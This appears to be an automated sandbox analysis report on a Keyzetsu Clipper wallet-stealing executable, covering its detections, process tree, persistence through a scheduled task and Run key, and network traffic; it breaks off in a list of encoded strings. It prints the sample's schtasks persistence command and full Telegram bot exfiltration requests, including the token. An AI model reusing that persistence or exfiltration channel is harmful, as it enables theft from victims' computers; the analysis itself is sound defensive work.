
Windows Analysis Report
nobtpajdjthawd.exe

Overview

General Information

Sample name: nobtpajdjthawd.exe
Analysis ID: 1635473
MD5: 37866be1ef3af2eb9f96671722a52ccf
SHA1: bc5fe4fed193686eee771c729c4d4144988e652e
SHA256: c1a4e75659105f547ab3ed1d3cd2b159f59841db1d77288601d005655132fe22
Tags: exe, user-aachum

Detection

Keyzetsu Clipper
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Keyzetsu Clipper
.NET source code contains potential unpacker
.NET source code contains very large strings
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • nobtpajdjthawd.exe (PID: 7292 cmdline: "C:\Users\user\Desktop\nobtpajdjthawd.exe" MD5: 37866BE1EF3AF2EB9F96671722A52CCF)
    • nobtpajdjthawd.exe (PID: 7324 cmdline: "C:\Users\user\Desktop\nobtpajdjthawd.exe" MD5: 37866BE1EF3AF2EB9F96671722A52CCF)
      • schtasks.exe (PID: 7528 cmdline: "schtasks.exe" /create /tn Tools /tr "C:\ProgramData\KMSAuto\accc.exe" /st 12:56 /du 23:59 /sc daily /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 7536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • accc.exe (PID: 1252 cmdline: "C:\ProgramData\KMSAuto\accc.exe" MD5: 30135A08665EDEE181BCF001BDE7A458)
        • accc.exe (PID: 7188 cmdline: "C:\ProgramData\KMSAuto\accc.exe" MD5: 30135A08665EDEE181BCF001BDE7A458)
        • WerFault.exe (PID: 7540 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1252 -s 764 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • cmd.exe (PID: 5304 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp5337.tmp.bat"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 2624 cmdline: timeout 7 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
    • WerFault.exe (PID: 7424 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7292 -s 800 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • accc.exe (PID: 5148 cmdline: "C:\ProgramData\KMSAuto\accc.exe" MD5: 30135A08665EDEE181BCF001BDE7A458)
    • accc.exe (PID: 1228 cmdline: "C:\ProgramData\KMSAuto\accc.exe" MD5: 30135A08665EDEE181BCF001BDE7A458)
    • WerFault.exe (PID: 5344 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5148 -s 780 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000013.00000002.3636637468.00000000033D1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_KeyzetsuClipper | Yara detected Keyzetsu Clipper | Joe Security |
00000014.00000002.1364848533.00000000032C2000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_KeyzetsuClipper | Yara detected Keyzetsu Clipper | Joe Security |
00000014.00000002.1364848533.00000000032CD000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_KeyzetsuClipper | Yara detected Keyzetsu Clipper | Joe Security |
00000001.00000002.1312691830.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_KeyzetsuClipper | Yara detected Keyzetsu Clipper | Joe Security |
Process Memory Space: nobtpajdjthawd.exe PID: 7324 | JoeSecurity_KeyzetsuClipper | Yara detected Keyzetsu Clipper | Joe Security |

System Summary

Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\ProgramData\KMSAuto\accc.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\nobtpajdjthawd.exe, ProcessId: 7324, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Tools

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-11T17:51:10.940495+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.4 | 49718 | 149.154.167.220 | 443 | TCP
2025-03-11T17:51:19.182564+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.4 | 49724 | 149.154.167.220 | 443 | TCP

AV Detection

Source: nobtpajdjthawd.exe | Avira: detected
Source: C:\ProgramData\KMSAuto\accc.exe | Avira: detection malicious, Label: TR/Dropper.Gen
Source: nobtpajdjthawd.exe | ReversingLabs: Detection: 81%
Source: nobtpajdjthawd.exe | Virustotal: Detection: 72%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49718 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49724 version: TLS 1.2
Source: nobtpajdjthawd.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\Hand1\source\repos\Portals\Portals\obj\Release\Portals.pdb source: nobtpajdjthawd.exe, accc.exe.1.dr
Source: Binary string: System.Windows.Forms.pdbac source: WER6131.tmp.dmp.25.dr
Source: Binary string: System.Windows.Forms.pdb source: WER6131.tmp.dmp.25.dr, WER5E53.tmp.dmp.23.dr, WER237C.tmp.dmp.4.dr
Source: Binary string: Portals.pdb source: WER6131.tmp.dmp.25.dr, WER5E53.tmp.dmp.23.dr, WER237C.tmp.dmp.4.dr
Source: Binary string: costura.dotnetzip.pdb.compressed source: nobtpajdjthawd.exe, 00000000.00000002.1277019771.00000000041E9000.00000004.00000800.00020000.00000000.sdmp, nobtpajdjthawd.exe, 00000001.00000002.1309844260.0000000000402000.00000040.00000400.00020000.00000000.sdmp, accc.exe, 0000000E.00000002.1417102381.0000000003449000.00000004.00000800.00020000.00000000.sdmp, accc.exe, 00000014.00000002.1364848533.0000000003247000.00000004.00000800.00020000.00000000.sdmp, accc.exe, 00000014.00000002.1364848533.0000000003251000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: WER6131.tmp.dmp.25.dr, WER5E53.tmp.dmp.23.dr, WER237C.tmp.dmp.4.dr
Source: Binary string: System.ni.pdbRSDS source: WER6131.tmp.dmp.25.dr, WER5E53.tmp.dmp.23.dr, WER237C.tmp.dmp.4.dr
Source: Binary string: Portals.pdb@\ source: WER5E53.tmp.dmp.23.dr
Source: Binary string: mscorlib.ni.pdb source: WER6131.tmp.dmp.25.dr, WER5E53.tmp.dmp.23.dr, WER237C.tmp.dmp.4.dr
Source: Binary string: System.pdb) source: WER6131.tmp.dmp.25.dr, WER5E53.tmp.dmp.23.dr, WER237C.tmp.dmp.4.dr
Source: Binary string: costura.dotnetzip.pdb.compressed|||DotNetZip.pdb|565BABCBCD978AF66FE1150CC58FDEAFC9815822|622080 source: nobtpajdjthawd.exe, 00000000.00000002.1277019771.00000000041E9000.00000004.00000800.00020000.00000000.sdmp, nobtpajdjthawd.exe, 00000001.00000002.1309844260.0000000000402000.00000040.00000400.00020000.00000000.sdmp, accc.exe, 0000000E.00000002.1417102381.0000000003449000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\Hand1\source\repos\Portals\Portals\obj\Release\Portals.pdb<;V; H;_CorExeMainmscoree.dll source: nobtpajdjthawd.exe, accc.exe.1.dr
Source: Binary string: q costura.dotnetzip.pdb.compressedlB source: nobtpajdjthawd.exe, 00000001.00000002.1312691830.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, accc.exe, 00000013.00000002.3636637468.00000000033D1000.00000004.00000800.00020000.00000000.sdmp, accc.exe, 00000014.00000002.1364848533.0000000003251000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: mscorlib.ni.pdbRSDS source: WER6131.tmp.dmp.25.dr, WER5E53.tmp.dmp.23.dr, WER237C.tmp.dmp.4.dr
Source: Binary string: p.pdb.compressed source: accc.exe, 00000014.00000002.1364848533.0000000003251000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: costura.dotnetzip.pdb.compressed@\ source: accc.exe, 00000014.00000002.1364848533.0000000003251000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.ni.pdb source: WER6131.tmp.dmp.25.dr, WER5E53.tmp.dmp.23.dr, WER237C.tmp.dmp.4.dr
Source: Binary string: System.pdb source: WER6131.tmp.dmp.25.dr, WER5E53.tmp.dmp.23.dr, WER237C.tmp.dmp.4.dr
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\tmp5337.tmp.bat
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\

Networking

Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49724 -> 149.154.167.220:443
Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49718 -> 149.154.167.220:443
Source: unknown | DNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /bot7326900034:AAGf6EZ3UM79PKfc6LWxCq-R0p2wwmA0Nyo/sendMessage?chat_id=8124584176&text=%F0%9F%A6%A0%201.0.0%0A%F0%9F%A4%96%20ID:%20%20%3Ccode%3E031912DB65A63CDAB5%3C/code%3E%0D%0A%F0%9F%91%A4%20User:%20%3Ccode%3Euser/932923%3C/code%3E%0D%0A%F0%9F%93%85%20%D0%94%D0%B0%D1%82%D0%B0%20%D1%83%D1%81%D1%82%D0%B0%D0%BD%D0%BE%D0%B2%D0%BA%D0%B8/%D0%B7%D0%B0%D1%80%D0%B0%D0%B6%D0%B5%D0%BD%D0%B8%D1%8F:%20%3Ccode%3E11/03/2025%2016:50:55%3C/code%3E%0D%0A%E2%9A%99%EF%B8%8F%20%3Ccode%3EC:%5CUsers%5Cuser%5CDesktop%5Cnobtpajdjthawd.exe%3C/code%3E%0D%0A%E2%9A%96%EF%B8%8F%20%D0%92%D0%B5%D1%81%20%D0%B1%D0%B8%D0%BB%D0%B4%D0%B0%20%3Ccode%3E923%20KB%3C/code%3E%0D%0A%F0%9F%97%92%20%D0%9A%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8%20%D0%BD%D0%B0%D0%B9%D0%B4%D0%B5%D0%BD%D1%8B%20%D0%B8%20%D0%B7%D0%B0%D0%BC%D0%B5%D0%BD%D0%B5%D0%BD%D1%8B%20%D0%B2%20%D1%84%D0%B0%D0%B9%D0%BB%D0%B0:%20%0A%0D%0A%D0%9D%D0%B0%D0%B9%D0%B4%D0%B5%D0%BD%D0%BD%D1%8B%D0%B5%20%D0%BA%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8%20%D0%B2%20%D0%B1%D1%83%D1%84%D0%B5%D1%80%D0%B5%20%D0%BE%D0%B1%D0%BC%D0%B5%D0%BD%D0%B0:%0D%0A%0A%0D%0A%D0%97%D0%B0%D0%BC%D0%B5%D0%BD%D0%B8%D0%BB%D0%B8%20%D0%BD%D0%B0%20%D0%BA%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8:%0D%0A%0A&parse_mode=html HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot7326900034:AAGf6EZ3UM79PKfc6LWxCq-R0p2wwmA0Nyo/sendMessage?chat_id=8124584176&text=%F0%9F%A6%A0%201.0.0%0A%F0%9F%A4%96%20ID:%20%20%3Ccode%3E031912DB65A63CDAB5%3C/code%3E%0D%0A%F0%9F%91%A4%20User:%20%3Ccode%3Euser/932923%3C/code%3E%0D%0A%F0%9F%93%85%20%D0%94%D0%B0%D1%82%D0%B0%20%D1%83%D1%81%D1%82%D0%B0%D0%BD%D0%BE%D0%B2%D0%BA%D0%B8/%D0%B7%D0%B0%D1%80%D0%B0%D0%B6%D0%B5%D0%BD%D0%B8%D1%8F:%20%3Ccode%3E11/03/2025%2016:51:02%3C/code%3E%0D%0A%E2%9A%99%EF%B8%8F%20%3Ccode%3EC:%5CProgramData%5CKMSAuto%5Caccc.exe%3C/code%3E%0D%0A%E2%9A%96%EF%B8%8F%20%D0%92%D0%B5%D1%81%20%D0%B1%D0%B8%D0%BB%D0%B4%D0%B0%20%3Ccode%3E131%20MB%3C/code%3E%0D%0A%F0%9F%97%92%20%D0%9A%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8%20%D0%BD%D0%B0%D0%B9%D0%B4%D0%B5%D0%BD%D1%8B%20%D0%B8%20%D0%B7%D0%B0%D0%BC%D0%B5%D0%BD%D0%B5%D0%BD%D1%8B%20%D0%B2%20%D1%84%D0%B0%D0%B9%D0%BB%D0%B0:%20%0A%0D%0A%D0%9D%D0%B0%D0%B9%D0%B4%D0%B5%D0%BD%D0%BD%D1%8B%D0%B5%20%D0%BA%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8%20%D0%B2%20%D0%B1%D1%83%D1%84%D0%B5%D1%80%D0%B5%20%D0%BE%D0%B1%D0%BC%D0%B5%D0%BD%D0%B0:%0D%0A%0A%0D%0A%D0%97%D0%B0%D0%BC%D0%B5%D0%BD%D0%B8%D0%BB%D0%B8%20%D0%BD%D0%B0%20%D0%BA%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8:%0D%0A%0A&parse_mode=html HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: nobtpajdjthawd.exe, 00000001.00000002.1312691830.000000000325F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
Source: accc.exe, 00000014.00000002.1359673420.0000000001596000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://go.microsoft.c
Source: nobtpajdjthawd.exe, 00000001.00000002.1312691830.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, accc.exe, 00000013.00000002.3636637468.00000000033D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.4.dr | String found in binary or memory: http://upx.sf.net
Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.com
Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.com
Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.com
Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.typography.netD
Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: nobtpajdjthawd.exe, 00000001.00000002.1312691830.000000000321C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.teleLR
Source: nobtpajdjthawd.exe, 00000001.00000002.1312691830.0000000003259000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: nobtpajdjthawd.exe, 00000001.00000002.1312691830.000000000321C000.00000004.00000800.00020000.00000000.sdmp, nobtpajdjthawd.exe, 00000001.00000002.1312691830.0000000003211000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
Source: nobtpajdjthawd.exe, 00000001.00000002.1312691830.000000000324C000.00000004.00000800.00020000.00000000.sdmp, nobtpajdjthawd.exe, 00000001.00000002.1312691830.0000000003248000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7326900034:AAGf6EZ3UM79PKfc6LWxCq-R0p2wwmA0Nyo/sendMessage?chat_id=81245
Source: unknown | Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown | Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49724

System Summary

Source: 0.2.nobtpajdjthawd.exe.42cff70.1.raw.unpack, wpOcuqWsqP.cs | Long String: Length: 12792
Source: 0.2.nobtpajdjthawd.exe.42cff70.1.raw.unpack, wpOcuqWsqP.cs | Long String: Length: 29668
Source: 0.2.nobtpajdjthawd.exe.42cff70.1.raw.unpack, wpOcuqWsqP.cs | Long String: Length: 12332
Source: 14.2.accc.exe.3449550.0.raw.unpack, wpOcuqWsqP.cs | Long String: Length: 12792
Source: 14.2.accc.exe.3449550.0.raw.unpack, wpOcuqWsqP.cs | Long String: Length: 29668
Source: 14.2.accc.exe.3449550.0.raw.unpack, wpOcuqWsqP.cs | Long String: Length: 12332
Source: C:\ProgramData\KMSAuto\accc.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Code function: 0_2_01432630
Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Code function: 1_2_014A6740
Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Code function: 1_2_014A4BB0
Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Code function: 1_2_014A9778
Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Code function: 1_2_014A7FD0
Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Code function: 1_2_014A6731
Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Code function: 1_2_014A4B9F
Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Code function: 1_2_014A9768
Source: C:\ProgramData\KMSAuto\accc.exe | Code function: 14_2_00A9253D
Source: C:\ProgramData\KMSAuto\accc.exe | Code function: 15_2_02802538
Source: C:\ProgramData\KMSAuto\accc.exe | Code function: 19_2_0191A590
Source: C:\ProgramData\KMSAuto\accc.exe | Code function: 19_2_01914BB0
Source: C:\ProgramData\KMSAuto\accc.exe | Code function: 19_2_01914B9F
Source: C:\ProgramData\KMSAuto\accc.exe | Code function: 19_2_059119C4
Source: C:\ProgramData\KMSAuto\accc.exe | Code function: 19_2_05912318
Source: C:\ProgramData\KMSAuto\accc.exe | Code function: 19_2_05912308
Source: C:\ProgramData\KMSAuto\accc.exe | Code function: 19_2_05913ED1
Source: C:\ProgramData\KMSAuto\accc.exe | Code function: 19_2_05911B70
Source: C:\ProgramData\KMSAuto\accc.exe | Code function: 19_2_05A8C1E0
Source: C:\ProgramData\KMSAuto\accc.exe | Code function: 19_2_05A867F8
Source: C:\ProgramData\KMSAuto\accc.exe | Code function: 19_2_05A87DB7
Source: C:\ProgramData\KMSAuto\accc.exe | Code function: 20_2_019D4BB0
Source: C:\ProgramData\KMSAuto\accc.exe | Code function: 20_2_019D4B9F
Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7292 -s 800
Source: nobtpajdjthawd.exe, 00000000.00000002.1277019771.00000000041E9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamePortals.exe0 vs nobtpajdjthawd.exe
Source: nobtpajdjthawd.exe, 00000000.00000002.1277019771.00000000041E9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameyandexbrowser_exe: vs nobtpajdjthawd.exe
Source: nobtpajdjthawd.exe, 00000000.00000002.1275665949.000000000145E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs nobtpajdjthawd.exe
Source: nobtpajdjthawd.exe, 00000000.00000000.1163505974.0000000000DC6000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamePortals.exe0 vs nobtpajdjthawd.exe
Source: nobtpajdjthawd.exe, 00000001.00000002.1309844260.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameyandexbrowser_exe: vs nobtpajdjthawd.exe
Source: nobtpajdjthawd.exe | Binary or memory string: OriginalFilenamePortals.exe0 vs nobtpajdjthawd.exe
Source: nobtpajdjthawd.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: accc.exe.1.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: nobtpajdjthawd.exe | Static PE information: Section: .CSS ZLIB complexity 1.0003119425768385
Source: accc.exe.1.dr | Static PE information: Section: .CSS ZLIB complexity 1.0003119425768385
            Source: 0.2.nobtpajdjthawd.exe.42cff70.1.raw.unpack, WPJHIdWGZYOD.csBase64 encoded string: 'H4sIAAAAAAAEAItJijY0jo1O1K1y1PXw0vUL0I0y0LWMrTYy0zE2rY1JAgA/kBJeIAAAAA==', 'H4sIAAAAAAAEAItJ0khK1jDQiE5M1s3I0s0r0K0yMNK1jK02tqytwRA0tazVrDHEELbQsTCv1dSMSQIAmnZO4E4AAAA=', 'H4sIAAAAAAAEAItJMqiITtRNc9R1M9C1jK02MaiNSQIAq44emBUAAAA=', 'H4sIAAAAAAAEAItJijaxiI020LV0dIqNNgRSuh5eun4BulGJutm5ulWx1ZbGtTFJAKXtzMonAAAA', 'H4sIAAAAAAAEAItJco820LVM1K1y1I2KrTY1rY1JAgBrh5bZFAAAAA==', 'H4sIAAAAAAAEAItJKoouKijOyEtMM7Ysdwp18XN19/Dy9vE1CQgMCg4xDwuPiIwySkpOSXVONzPNys61yHcrzDQsKS1zrKisiq02MtExNqmNSQIAQVwclkgAAAA=', 'H4sIAAAAAAAEAItJcow20LVM1K1y1I2KrTY2ro1JAgCSkcF9FAAAAA==', 'H4sIAAAAAAAEAItJ0tBIyixJzs/MS04szrDStNcorCnQjE7UrTLQtYytNjGs1YxJAgBI3BA7JgAAAA==', 'H4sIAAAAAAAEAItJivbxjY1O1M3O1a1y1PXw0vUL0I0y1LWMrTYy0zE2ro1JAgBbyj43IwAAAA==', 'H4sIAAAAAAAEAItJcqk2rI021bV01PXw0vUL0A2NBQkYIgSiEnWzc3WrYquNjWpjkgArcHyrMQAAAA==', 'H4sIAAAAAAAEAItJiog21LV01PXw0vUL0I1K1M3O1a2KrTY2ro1JAgANsrq/HQAAAA==', 'H4sIAAAAAAAEAItJColO1K1y1I0y0LWMrTay0DE2ro1JAgCQuGQ4FwAAAA==', 'H4sIAAAAAAAEAItJKjGMNtC1dNStiq02Nq6NSQIA8OfYfRIAAAA=', 'H4sIAAAAAAAEAItJ0kjKS9LUiE7UrTLQtYytNras1YxJAgAS93gFFwAAAA=='
            Source: 0.2.nobtpajdjthawd.exe.42cff70.1.raw.unpack, wpOcuqWsqP.csBase64 encoded string: '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
Source: 0.2.nobtpajdjthawd.exe.42cff70.1.raw.unpack, ltCqRsWfGmt.cs | Base64 encoded string: 'H4sIAAAAAAAEAAvOTyspTyxKjfHNTC7KLwbyYsIz81Lyy4tjnEuLilLzSsJSi4oz8/NigkrzAHLTHVUtAAAA'
            Source: 0.2.nobtpajdjthawd.exe.42cff70.1.raw.unpack, ctleIqXFerYnq.csBase64 encoded string: 'H4sIAAAAAAAEADNNNDGucs7MLwxzKjbx9ynOLPSPDLQsM3XJcPUxL3P2AgDiONk/IAAAAA==', 'H4sIAAAAAAAEADM3NjKzNDAwMDaxcnR0TzNzjTIO9TW3DPBOSzbzCa9wLtQNMigwKi/PdTTwq8wHANMNQhsuAAAA', 'H4sIAAAAAAAEAGWPT0rDQBjF94Xe4buB++xCM9JAwGBSim5ceQFdDkJrKwgKxSotFqSbHmAMRqPRnOF9V/AC9gh+39Q/oLuZN+/93pv1cjWjOAqIbLcfRyft1np5taLe8eFRQLaXmd2048XrM8INHJ/CEY94qAe8oUGBF1RbeJK3gUiPKEWueCLxKMyNhN8Xtx/VhGwa5l1/nekVU5Q8JNyjQo0Hwdos3je+bD4lLNDwucBqvtQGEqrDsxiFzxekinTi1fd9aQXx2LtqOOnfjhOTCRB3v1E1oiRB/sEXMkU+NpZVAzU0smwDd0G7ZTs76d5BP0wSkytx/lOt6zfr/kE1l5n8O/YJ69jp2GwBAAA=', 'H4sIAAAAAAAEAEtKNiwsLs9NKUuuLK9Kzi2oqEiuKCxLNU03SE/NM89ONy5JNKs0LarMSwUAr2cj/yoAAAA=', 'H4sIAAAAAAAEAA3KyQ2AIBAAwIZ8IIfYDqywJBwBJFzV67xHw1neEZ8Oa2yIeU6YpRuBBE2SHllT1xJ1JXPov6LzwbZNqeDUdgIsMD/FXdEolF1myiM6+QEXjvtIVQAAAA==', 'H4sIAAAAAAAEAHMxL3XySPMKyvX2S05OCTQrLA4r9EhxC/T28gk38ipILHMFANZUwu0iAAAA', 